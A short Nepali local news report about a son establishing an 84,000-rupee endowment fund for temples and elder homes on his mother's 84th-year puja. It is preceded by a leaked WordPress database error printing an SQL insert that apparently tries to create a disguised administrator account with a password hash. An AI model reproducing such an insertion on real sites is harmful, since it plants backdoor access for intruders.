WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR.8STpdwSJSrYzrahW0YWFoXuNsoS.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 13:58:44', '', 'admlnlx', 'admlnlx')
चितवन, माघ २८–
भरतपुर उपमहानगरपालिका–५ लंकु धारापानी चोक निवासी ८४ वर्षीया देवकली कँडेलको ८४ पूजाको अवसरमा ८४ हजार रुपैयाँ बराबरको अक्षय कोष स्थापना गरिएको हो ।
छोरा समाजसेवी जोन कँडेलले आज आमाको ८४ पूजाको अवसरमा सो रकम बराबरको अक्षय कोष स्थापना गरेका हुन् । आमाको सुस्वास्थ्य कामनासहित स्थापना गरिएको अक्षयकोषबाट धार्मिक आस्थाका मन्दिर र वृद्धआश्रमलाई गरिने समाजसेवी कँडेलले जानकारी दिनुभयो । समाजसेवी कँडेलले विभिन्न अवसरहरुमा अक्षयकोष स्थापना गर्दै आईरहेका छन् ।